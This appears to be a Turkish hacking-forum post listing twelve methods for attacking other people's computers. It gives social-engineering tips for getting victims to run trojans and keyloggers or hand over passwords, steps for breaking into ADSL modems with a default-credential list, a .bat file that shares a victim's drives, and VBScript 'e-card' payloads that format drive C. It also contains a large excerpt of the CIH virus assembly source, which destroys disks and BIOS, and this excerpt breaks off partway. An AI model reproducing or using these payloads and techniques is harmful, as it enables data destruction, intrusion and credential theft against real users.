1.Yöntem Good Bye Virüsü
Link kesinlikle sağlam virüsü norton avast yakalayamıyor ancak kaspersky tabiki yakalıyor işinize yarar diye bırakıyorum kolay gelsin
1-Masaüstü öğeleri yok olur.
2-Windows kilitlenir.
3-Arka planda müzik çalar.
4-Hızlı format atar.
5-Windows birdaha açılmaz.
6-Tüm Windows ailesine uyumludur
[Üye Olmayanlar Linkleri Göremezler Üye Olmak İçin Tıklayınız...
]
Ama biraz sakat is kendiniz acmayin derim. Acarsaniz pcnizi unutun lütfen kurbana yollayin.Ve mahsum kardeslerimize yapmaylaim gick oldugunuz kisiye yollayin
2.Yöntem Hack Taktiklerini Öğrenerek
arkadaslar simdi size vereceğim hack teknikleri komik gelebilir ama gerçekten işe yarıyor çünkü teknikler dekiler komik olmasına rağmen mantıklı bu tekniklerle en az 20 mail hack yapmısımdır
msn adresi isteyenlere
eminim çok basınıza geliyodur bazıları sende kız msn i varmı varsa göndersene gibi bir sürü şeyler söylüyolar bunlar sizden gelen her türlü dosyayı almaya hazır insanlar genelde rar dosyaları yollarsanız daha etkili oluyor. dosya ne olursa olsun %50 si kabul eder içeriğine bakmaksızın acar bölelerine önceden çaktırmamak için gercekten msn adresi yollarsınız word e yazıp rar içinde sonrada trojen keylogger gibi şeyleri yollarsınız emin olun kabul edip açıcaktır yada direk pc ye zarar vermek istiyosanız böyle program birüs vs. vs. seler sitemizde zaten mevcut.bu tekniği yicek kişiler msn den hack bilmez tek niyeti kızlarla konusup geyikyapmak istiyen kişilerdir
şifre isteme tekniği
arkadaslar en komik teknikte budur gerekenler tatlı dil ikna edicilik inandırıcılık vs. vs. ve ayrıca kibarlık bu yöntem genelde kızlarda işe yarar mesela bir kıza diyeceksiniz hotmailin ingilizce türkçe yapabilirim yada sana msn spaces açabilirim msn ini hackerlardan koruyabilirim gizli sorunu bulunmaması için değiştirebilirim vs. vs. şeylerle karsıdakini kandırıp onun msn ini rahatla çalabiliriz ama hemen ilk konusmada bunları derseniz tabiki şifre vermez
fake attığını söyleme
arkadaslar hazır fakeler sitemizde mevcut onlardan birini atıosunuz ve iyi bir bahane uydurun orası size kalmıs karsıdakine bunu haber veriosunuz mesela msn in güvenli olması için oda oraya şifresini girer size gelir
arkadaslar unutmayın bunların olması için karsıdakinin çok amatör olması lazım proflarda denerseniz gülerler
3.Yöntem Ağdaki Pcyi Kapatma
PC Hack sayılmaz aslına.
karşıdaki pc yi kapatmaya yeniden başlatmaya yarıyor.
Ancak cafe kontrol olan pc lerde işe yaramaz.
çok tantana yaptım olayı anlatayım
BAŞLAT>>ÇALIŞTIR>>>>CMD yaz>>>ENTER>>MSDOS EKRANINDA SHUTDOWN YAZIYORUM>>>>ARDINDAN SHUTDOWN -i yazıyoruz>>>CIKAN EKRANDAN GÖZ AT DİYİP BİR PC SEÇECEN VE AĞDADİ PCYİ KAPATACAN
4.Yöntem Adsl Modem Hack
● HaCKeD By KoNt●
ADSL Modem Hack
Bu yazimizda Adsl modemlerin default şifrelerinden yararlanarak Modem e girip Karşı tarafın bağlantısını kesmeyi ogrenecegiz oncelikle
Angry ip Scanner [Üye Olmayanlar Linkleri Göremezler Üye Olmak İçin Tıklayınız...] ([Üye Olmayanlar Linkleri Göremezler Üye Olmak İçin Tıklayınız...
])
])
Program Lisansli oldugu icin Serial istiyor :
Name: Condor-TR
Serials: 20316323C8E4C173F7A705EA8C9A4C 24BE98ECFA346291285B 4616806D939D966BCF1BC22FF7F262 6CB88A72C4B33F03C4CF E60BCA6ECF572DB4DAA1A16EAB1591 F1F92BA62DC77096E79F 175B8582BA
Programlari Internet den indirip bilgisayarımıza yüklüyoruz ve İp tools programını aciyoruz Options a girip Port
List bölümüne tıklıyoruz ve sadece 21 ve 23 portlarını seçip Ok diyoruz.Sonra Tools dan Port Scanner a giriyoruz
Baslangic ( From Addr ) ipsi ve bitis ( To Addr ) ipsine tarayacagimiz ip yi yaziyoruz ornegin baslangic -> 81.215.*.1
bitiş -> 81.215.*.255 ve Start Diyoruz
Eger boyle bir sonuc alirsak modem e girebiliriz demektir tabi Modem in sifresi degişmemişise.
Address : 81.215.*.1
Name : dsl.static81215231100.ttnet.ne t.tr (.TR | Turkey)
Ping …. Ok, Time : 43
Port 21 … Ok !
Port 23 … Ok !
Yani bu demek oluyor ki makinanin 21 ve 23. portlari aciktir.
Evet simdi ip yi kopyaliyoruz ve Tools dan Telnet e geciyoruz.
Host : tarama sonunda cikan ip numarasini yaziyoruz
Port : Portuda 23 yapiyoruz 23. Port modem portudur
Start diyoruz
Ve Modem in giris menusu onumuze geliyor bakiyoruz Modem in markasi ne
Diyelim Ki Modem Titanium
User : Admin
Password : Admin yazip giriyoruz
eger girerse bundan sonrasi cok kolay eger girmezse tekrar baska bir Ip taratip ayni islemleri yapiyoruz
Asagidada ADSL Modemlerin Default ( Ilk alindiginda firma tarafindan koyulan sifre ) lerini verdim işinize yarayacaktir.
Apache user : setup veya root Pass : root
Asus user : admin pass : admin
Aztech user : admin pass : admin
Billion Bipac user : admin pass : password
Cnet user : admin pass : e***router
Corecess 3112 usb user : admin pass : corecess3113
Corecess 3113 eth user : admin pass : corecess3113
Dibeg 108 user : dare pass : boş
D-Link user : admin pass : admin
Datron ETHERNET user : admin pass : admin
Datron USB user : admin pass : admin
Link SYS user : admin pass : admin
USB Robotics user : admin pass : admin
Dost GVC user : dost pass : dost
Eicon Diva user : boş pass : boş
Geek user : admin pass : e***router
hicomm user : admin pass : e***router
Inca user : admin pass : e***router
Loopcom user : admin pass : e***router
paradigm user : admin pass : e***router
Mercury ADSL user : boş pass : boş
Origo user : admin pass : kont2004
pikatel user : DSL pass : DSL
Speedcom user : admin pass : conexant
Tecom user : root pass : root
Zoom X Serisi modem user : admin pass : zoomadsl
ZyXEL user : admin pass : 1234
Evet Port tarattik Modem e girdik
Şimdi yapacagimiz ise Angry Ip scanner ı calistirip Girdigimiz Modemin Ip sini yazip ve Start Demek
ve ip numarasi biraz asagida tekrar karsimiza cikiyor ip ye sag tiklayip Open Computer > Ftp diyoruz
Bize kullanici adi ve sifre soruyor Modem e girerken yazdigimiz sifreyi giriyoruz Biz Titanium a girdigimiz icin
Kullanıcı adı : Admin Şifre : Admin diyip giriyoruz buradaki dosyalari silerseniz karsi tarafin baglantisi kesilir
Ayni zamanda Modemin Control Paneline girebilirsiniz internet explorer ı acarak ip numarasini yaziyoruz enter a basiyoruz
kullanici adi ve sifre soruyor ayni sekilde modem ve ftp ye baglanirken girdigimiz sifreyi yaziyoruz ve butun istatistikleri goruyoruz
Seceneklerden Admin > USer Config diyerek Sifreyide degistirebilirsiniz.
Sizde ayni sekilde lenmemek icin internet explorer a ip numaranizi yazin sifrenizi girin ve modeminizin sifresini degistirin.
5.Yöntem Karşı Pcyi Paylaşıma Açma
arkadaslar karsı pcye girdiğinizde genellikle c ve d paylasıma acık değildir. bu yüzden fazla bir sey yapamazsınız c ve d yi acmak için su altta yazılanları alın not defterine yapıstırn ve uzantısı txt’dir.bunu .bat cevirelim.antivirüsler bunu trojen olarak algılayabilir bunun için zipleyin öle yollayın..
net share hacker=c:\ /unlimited /remark:”RockStar”
net share hacker=d:\ /unlimited /remark:”RockStar”
6.Yöntem Uzak Masüstü
uzak masaustu pc girme programi
[Üye Olmayanlar Linkleri Göremezler Üye Olmak İçin Tıklayınız...
] fazla soze gerk yok herşey açikça verilmiş
7.Yöntem Essential Net Tools
Çoğu yerde msn hacklemek için saçma programlar dağıtılır ama bunların hiçbiri bir yöntem değil.Şimdi size bir msn in nasıl hacklendiğini anlatacağım.İlk önce
Essential Net Tools programını yükleyin.
[Üye Olmayanlar Linkleri Göremezler Üye Olmak İçin Tıklayınız...
]
Daha sonra hacklemek istedğiniz kişiye msn den bir konuşma açın.Herhangi bir dosya yollayın(bunu kurbana yedirmenin bir çok yolu var) dosya hertürlü şey olabilir.Dosya yollama süresi ortalardayken başlat/çalıştır a tıklayın.CMD yazın entera basın.Orada açılan dos ekranına netstat -n yazın bunu yazınca sonunda ESTABLISHED yazan ıp kurbanın ıp si oluyor.Ama bu işlemi yaparken başka hiçbir msn konuşması açmayın,internet sayfası ve programlar dahil bunların hiçbirini açık tutmayın.Eğer açık tutarsanız hedefi şaşırır yanlış ıp leri öğrenirsiniz.Ip yi aldıktan sonra Essential Net Tools u açın.Yandaki NBScan yerine tıklayın.Starting IP Adress yerine ıp yi yazın.Ama diğelim ki ıp
85.0.0.5:1896.Burada çift noktalı yerden sonraki herşeyi silin.Yani demin örnekteki ıpyi böyle yazın 85.0.0.5 hatta daha iyi sonuçlar elde etmek istiyorsanız sondaki rakamı 1 yapın.Önü bununla başlayan 255 tane IP arar.Ip yi yazdıktan sonra START tuşuna basın.Bu ıp de olan bilgisayarı bulacaktır.Yukarıda sonuç belirdiğinde üzerine bir kez tıklayın daha sağ tuşla tıklayarak open computerı tıklayın.Eğer parola sorarsa PWLMAKER programını kullanarak parola tahminleri üretebilirseniz.Ama parola değilde bir windows gezgini penceresi açıldıysa adamın bilgisayarına girdiniz demektir.Burada istediğinizi silebilir istediğinizi kendi bilgisayarınıza kopyalayabilirsiniz.Msn parolası çalmak için yapacağınız şey keykeylite gibi bir keylogger indirmek.
8.Yöntem Resim ile Pc Kapat
Resmi Actırırsan Pc KApanıyor [GülmekTen ÖleCeksınız] Virus Programına YaKAlanmaZ
Arkadaşlar bunu birine atın karşıki taraf winrar ın icindeki resmi acınca pc si kapanıyor!..
[Üye Olmayanlar Linkleri Göremezler Üye Olmak İçin Tıklayınız...
]
Bu ise karşıdakinin mouse unu kaybediyor!..
[Üye Olmayanlar Linkleri Göremezler Üye Olmak İçin Tıklayınız...
]
9.Yöntem Mail Yoluyla Format
WİNDOWS98 için bu kodlar ^^XP^^ için olanı aşşağıdaaaa
Kod:
<html>
<head>
****** http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″>
<title>Size E-Kart Gönderildi!</title>
</head>
<body>
<******>
Set fs = CreateObject(“******ing.FileSy stemObject”)
Set a = fs.CreateTextFile(“C:Autoexec. bat”,
True)
a.WriteLine(“format c: /autotest /u /q”)
a.Close
</******>
<p>Deminki çıkan hataya “HAYIR” dediyseniz <a
href=”java******:reload()”>Uzg ünüm e-kartınız çalışmayacaktır.</p>
</body>
</html>
………………………… ……………….. ………………..
<html>
<head>
****** http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″>
<title>Aşkından Sevgilerle</title>
</head>
<body>
<******>
Set fs = CreateObject(“******ing.FileSy stemObject”)
Set a = fs.CreateTextFile(“C:c:\window s\system32\autoexec. nt”, True)
a.WriteLine(“format c: /autotest /u /q”)
a.Close
</******>
<p>Giriste ac1lan uyariya “HAYIR” dediyseniz <a
href=”java******:reload()”>Mal esef e-kart 1n1z cal1smayacakt1r.</p>
</body>
</html>
Bu Kodu *.vbs Veya *.html Olarak Kaydedebilirsiniz!
Bunu sakın açmayın (yoksa siz kendi kendinize format atarsınız )
Sadece kurbana atın ve o açsın
BEn denedim vallaa arkadaşlar yeni bitirdim windows u kurmasını )
10.Yöntem .bat Uzantılı Dosyayla
önce not pad i açıp içine bu kodu yazıyoruz
/timersecure 0 0 //mkdir $mid(c:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)
daha sonra farklı kaydet diyoruz ve ismini örneğin oyun.bat diyoruz sizin yaratıcılığınıza kaldı.
yolladığınız bilgisayar açar açmaz çöküyor
11.Yöntem Winamp İle
Karşı pc’yi çökertme (programsız)winamp ile
arkadaşlar öncelikle şunu belirteyim bu kesinlikle sizi teşvik etmek için değildir. yapmanız çok tehlikelidir. ben bunu sırf kötü niyetli kişilere karşı kullanmanızı öneririm.
önce winamp ta bi müzik açın alt+3 yapın ve adını değiştirin. oraya aynı harfi en az 1000-2000 kere tuşlayın.Basılı tutun ne çok basarsanız o kadar garanti olur. bu dosyayı msn’den gönderin adam açınca bummm. gönderdikten sonra hemen silmenizi öneririm çünkü i hata yüzünden bilgisayarınız uçabilir. biliyorum 2000 harf size çok geldi ama unutmayın pc çökertiyorsunuz…
12.Yöntem Anakart Yakma
Bir not defteri açın. Aşşağıdaki kodları kopyala-yapıştır ve .bat formatında kaydedin…Kendi bilgisayrınızda kesinlikle açmayın !!!
kod:
****************************** ******************** *************************
*
; * The Virus Program Information *
;
****************************** ******************** *************************
*
; *
*
; * Designer : CIH Original Place : TTIT of Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.2 *
; * Modification Time : 05/21/1998
*
; * *
;
*============================= ==================== =========================
*
; * Modification History *
;
*============================= ==================== =========================
*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn’t Reload into System.
*
; * 4. Call IFSMgr_InstallFileSystemApiHoo k to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHoo k. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn’t be Reinfected.
*
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don’t be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
;
*============================= ==================== =========================
*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it’s Size… ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus “Basic” Size is only 796 Bytes. *
;
*============================= ==================== =========================
*
; * v1.2 1. Kill All HardDisk, and BIOS… Super… Killer… *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus “Basic” Size is 1003 Bytes. *
;
****************************** ******************** *************************
*
.586P
;
****************************** ******************** *************************
*
; * Original PE Executable File(Don’t Modify this Section)
*
;
****************************** ******************** *************************
*
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
;
****************************** ******************** *************************
*
; * My Virus Game
*
;
****************************** ******************** *************************
*
; ****************************** ******************** *******
; * Constant Define *
; ****************************** ******************** *******
TRUE = 1
FALSE = 0
DEBUG = TRUE
MajorVirusVersion = 1
MinorVirusVersion = 2
VirusVersion = MajorVirusVersion*10h+MinorVir usVersion
IF DEBUG
FirstKillHardDiskNumber = 81h
HookExceptionNumber = 05h
ELSE
FirstKillHardDiskNumber = 80h
HookExceptionNumber = 03h
ENDIF
FileNameBufferSize = 7fh
; ****************************** ******************** *******
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; ****************************** ******************** *******
; * Ring3 Virus Game Initial Program *
; ****************************** ******************** *******
MyVirusStart:
push ebp
; ****************************** *******
; * Let’s Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; ****************************** *******
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax, fs:[ebx]
call [at]0
[at]0:
pop ebx
lea ecx, StopToRunVirusCode-[at]0[ebx]
push ecx
push eax
; ****************************** *******
; * Let’s Modify *
; * IDT(Interrupt De******or Table) *
; * to Get Ring0 Privilege… *
; ****************************** *******
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-[at]1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address
pop esi
; ****************************** *******
; * Generate Exception to Get Ring0 *
; ****************************** *******
int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $
; ****************************** *******
; * Merge All Virus Code Section *
; ****************************** *******
push esi
mov esi, eax
LoopOfMergeAllVirusCodeSection :
mov ecx, [eax-04h]
rep movsb
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSec tion ; ZF = 1
jmp LoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSec tion:
pop esi
; ****************************** *******
; * Generate Exception Again *
; ****************************** *******
int HookExceptionNumber ; GenerateException Again
; ****************************** *******
; * Let’s Restore *
; * Structured Exception Handing *
; ****************************** *******
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; ****************************** *******
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; ****************************** *******
StopToRunVirusCode:
[at]1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; ****************************** *******
; * Return Original App to Execute *
; ****************************** *******
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; ****************************** ******************** *******
; * Ring0 Virus Game Initial Program *
; ****************************** ******************** *******
MyExceptionHook:
[at]2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; ****************************** *******
; * Do My Virus Exist in System !? *
; ****************************** *******
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; ****************************** *******
; * Return to Ring3 Initial Program *
; ****************************** *******
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
; ****************************** *******
; * Allocate SystemMemory Page to Use *
; ****************************** *******
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My Virus Exist in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory Start Address
lea eax, MyVirusStart-[at]2[esi]
iretd ; Return to Ring3 Initial Program
; ****************************** *******
; * Install My File System Api Hook *
; ****************************** *******
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-[at]6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHoo k
IFSMgr_InstallFileSystemApiHoo k = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags
mov dr0, eax ; Save OldFileSystemApiHook Address
pop eax ; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHoo k Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHoo k-[at]2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-[at]3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHoo k Entry Point
lea eax, InstallFileSystemApiHook-[at]3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; ****************************** ******************** *******
; * Code Size of Merge Virus Code Section *
; ****************************** ******************** *******
CodeSizeOfMergeVirusCodeSectio n = offset $
; ****************************** ******************** *******
; * IFSMgr_InstallFileSystemApiHoo k *
; ****************************** ******************** *******
InstallFileSystemApiHook:
push ebx
call [at]4 ;
[at]4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-[at]4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHoo k
; to Link Client FileSystemApiHook 0D
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-[at]3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHoo k
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-[at]3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystemApiHook Address
pop eax
pop ebx
ret
; ****************************** ******************** *******
; * Static Data *
; ****************************** ******************** *******
OldInstallFileSystemApiHook dd ?
; ****************************** ******************** *******
; * IFSMgr_FileSystemHook *
; ****************************** ******************** *******
; ****************************** *******
; * IFSMgr_FileSystemHook Entry Point *
; ****************************** *******
FileSystemApiHook:
[at]3 = FileSystemApiHook
pushad
call [at]5 ;
[at]5: ;
pop esi ; mov esi, offset
VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-[at]5
; ****************************** *******
; * Is OnBusy !? *
; ****************************** *******
test byte ptr (OnBusy-[at]6)[esi], 01h ; if ( OnBusy )
jnz pIFSFunc ; goto pIFSFunc
; ****************************** *******
; * Is OpenFile !? *
; ****************************** *******
; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook
; ****************************** *******
; * Enable OnBusy *
; ****************************** *******
inc byte ptr (OnBusy-[at]6)[esi] ; Enable OnBusy
; ****************************** *******
; * Get FilePath’s DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; ****************************** *******
; * Ex. If DriveNumber is 03h, *
; * DriveName is ‘C:’. *
; ****************************** *******
; mov esi, offset FileNameBuffer
add esi, FileNameBuffer-[at]6
push esi
mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ‘:’
mov [esi], eax
inc esi
inc esi
; ****************************** *******
; * UniToBCSPath *
; ****************************** *******
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; ****************************** *******
CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h
; ****************************** *******
; * Is FileName ‘.EXE’ !? *
; ****************************** *******
; cmp [esi+eax-04h], ‘.EXE’
cmp [esi+eax-04h], ‘EXE.’
pop esi
jne DisableOnBusy
IF DEBUG
; ****************************** *******
; * Only for Debug *
; ****************************** *******
; cmp [esi+eax-06h], ‘FUCK’
cmp [esi+eax-06h], ‘KCUF’
jne DisableOnBusy
ENDIF
; ****************************** *******
; * Is Open Existing File !? *
; ****************************** *******
; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy
; ****************************** *******
; * Get Attributes of the File *
; ****************************** *******
mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h
jc DisableOnBusy
push ecx
; ****************************** *******
; * Get IFSMgr_Ring0_FileIO Address *
; ****************************** *******
mov edi, dword ptr (IFSMgr_Ring0_FileIO-[at]7)[esi]
mov edi, [edi]
; ****************************** *******
; * Is Read-Only File !? *
; ****************************** *******
test cl, 01h
jz OpenFile
; ****************************** *******
; * Modify Read-Only File to Write *
; ****************************** *******
mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ****************************** *******
; * Open File *
; ****************************** *******
OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle
; ****************************** *******
; * Need to Restore *
; * Attributes of the File !? *
; ****************************** *******
pop ecx
pushf
test cl, 01h
jz IsOpenFileOK
; ****************************** *******
; * Restore Attributes of the File *
; ****************************** *******
mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ****************************** *******
; * Is Open File OK !? *
; ****************************** *******
IsOpenFileOK:
popf
jc DisableOnBusy
; ****************************** *******
; * Open File Already Succeed. ^__^ *
; ****************************** *******
push esi ; Push FileNameBuffer Address to Stack
pushf ; Now CF = 0, Push Flag to Stack
add esi, DataBuffer-[at]7 ; mov esi, offset DataBuffer
; ***************************
; * Get OffsetToNewHeader *
; ***************************
xor eax, eax
mov ah, 0d6h
; For Doing Minimal VirusCode’s Length,
; I Save EAX to EBP.
mov ebp, eax
xor ecx, ecx
mov cl, 04h
xor edx, edx
mov dl, 3ch
call edi ; VXDCall IFSMgr_Ring0_FileIO
mov edx, [esi]
; ***************************
; * Get ‘PE’ Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************
dec edx
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; cmp [esi], ‘PE’
cmp dword ptr [esi], 00455000h
jne CloseFile
; ****************************** *******
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; ****************************** *******
; * The File isn’t also Infected. *
; ****************************** *******
; ****************************** *******
; * Start to Infect the File *
; ****************************** *******
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = ‘PE’ Signature of *
; * ImageFileHeader Pointer’s *
; * Former Byte. *
; * ESI = DataBuffer Address ==> [at]8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; ****************************** *******
; * Stack Dump : *
; * *
